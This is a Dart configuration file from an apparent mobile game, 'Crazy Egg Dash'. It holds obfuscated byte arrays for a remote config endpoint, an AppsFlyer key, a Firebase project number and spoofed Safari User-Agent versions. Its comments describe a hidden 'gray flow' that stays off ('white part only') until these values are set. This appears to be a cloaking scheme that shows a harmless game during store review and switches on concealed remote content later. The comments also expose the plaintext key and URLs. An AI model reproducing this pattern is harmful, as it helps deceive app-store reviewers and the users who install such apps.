import '../core/feather_codec.dart';

/// ════════════════════════════════════════════════════════════
/// Encoded gray-flow credentials. All secrets are stored as
/// obfuscated byte arrays (never plaintext):
///   1. Put plaintext values into tool/encode_era_values.dart.
///   2. Ensure the cipher (`_shardPepper`, LCG constants,
///      position scramble) in lib/hatchway/core/feather_codec.dart
///      matches the tool.
///   3. Run `dart run tool/encode_era_values.dart`.
///   4. Paste the printed byte arrays below. The VERIFY block
///      must round-trip EXACTLY (a stray byte silently corrupts
///      the URL).
///
/// The gray gate stays disabled (white part only) until `endpoint`,
/// `appsFlyerKey` and `firebaseProjectNumber` are all non-empty.
abstract final class EraHatchConfig {
  static const String appTitle = 'Crazy Egg Dash';
  static const String bundleId = 'com.crazyeggdash.crazyeggdashgame';

  /// iOS App Store numeric id (used for GCD + store_id).
  static const String iosStoreId = '6790313119';

  static const int pushSnoozeSeconds = 259200; // 3 days
  static const int organicRecheckSeconds = 6;

  // ── Encoded secrets (generated by tool/encode_era_values.dart) ────────
  // endpoint — https://crazyeggdash.com/config.php
  static const List<int> _endpoint = <int>[
    28, 209, 84, 87, 47, 19, 206, 122, 171, 137, 88, 173, 194, 44, 238, 235,
    118, 188, 183, 36, 62, 41, 255, 253, 218, 69, 59, 51, 222, 171, 142, 20, 4,
    76, 152,
  ];
  // privacy — https://crazyeggdash.com/privacy-policy.html
  static const List<int> _privacy = <int>[
    251, 11, 188, 239, 218, 233, 65, 137, 111, 227, 27, 53, 119, 31, 155, 214,
    184, 63, 247, 132, 185, 107, 30, 173, 168, 116, 84, 118, 240, 112, 37, 165,
    207, 66, 159, 200, 81, 14, 155, 96, 172, 189, 176, 233,
  ];
  // support — https://crazyeggdash.com/support.html
  static const List<int> _support = <int>[
    150, 172, 190, 126, 25, 121, 125, 154, 42, 241, 41, 14, 70, 249, 3, 148, 57,
    172, 218, 58, 153, 129, 28, 221, 235, 107, 147, 238, 87, 24, 211, 220, 80,
    214, 53, 72, 172,
  ];
  // appsFlyerKey — oPXjEGp3vCP3fDVGf8Xm5Y
  static const List<int> _appsFlyerKey = <int>[
    116, 128, 68, 105, 118, 61, 56, 173, 223, 194, 104, 214, 195, 114, 86, 245,
    162, 166, 131, 102, 14, 63,
  ];
  // firebaseProject — 239730018066
  static const List<int> _firebaseProject = <int>[
    145, 165, 86, 166, 186, 76, 49, 145, 31, 171, 84, 98,
  ];
  // gcd — https://gcdsdk.appsflyer.com/install_data/v5.0/
  static const List<int> _gcd = <int>[
    56, 253, 105, 227, 227, 162, 41, 185, 179, 168, 130, 221, 182, 121, 150,
    141, 41, 200, 136, 9, 165, 145, 198, 60, 31, 160, 104, 74, 210, 128, 149,
    254, 235, 112, 150, 9, 34, 35, 60, 14, 16, 60, 124, 35, 140, 70, 61,
  ];
  // User-Agent version fragments — vary per project.
  // webkit — 605.1.15
  static const List<int> _webkit = <int>[129, 94, 43, 142, 224, 3, 144, 206];
  // safari — 18.7
  static const List<int> _safari = <int>[108, 47, 234, 195];
  // safariTail — 604.1
  static const List<int> _safariTail = <int>[180, 69, 90, 208, 123];

  // OneLink is OPTIONAL — it must NEVER be part of the gate-enable check.
  // oneLinkHost — crazyeggdash.onelink.me
  static const List<int> _oneLinkHost = <int>[
    37, 108, 165, 85, 161, 148, 46, 113, 180, 12, 66, 110, 77, 67, 73, 230, 55,
    13, 31, 239, 89, 31, 26,
  ];

  static String get endpoint => crackShell(_endpoint);
  static String get privacyUrl => crackShell(_privacy);
  static String get supportUrl => crackShell(_support);
  static String get gcdBase => crackShell(_gcd);
  static String get webKitVersion => crackShell(_webkit);
  static String get safariVersion => crackShell(_safari);
  static String get safariTail => crackShell(_safariTail);
  static String get appsFlyerKey => crackShell(_appsFlyerKey);
  static String get firebaseProjectNumber => crackShell(_firebaseProject);
  static String get oneLinkHost => crackShell(_oneLinkHost);

  static String get storeToken => 'id$iosStoreId';

  /// Gate needs config endpoint + AF key + Firebase project number.
  /// Do NOT add optional fields (e.g. OneLink) here — a missing optional
  /// value would silently disable the whole gray flow.
  static bool get grayCredentialsReady =>
      endpoint.isNotEmpty &&
      appsFlyerKey.isNotEmpty &&
      firebaseProjectNumber.isNotEmpty;
}
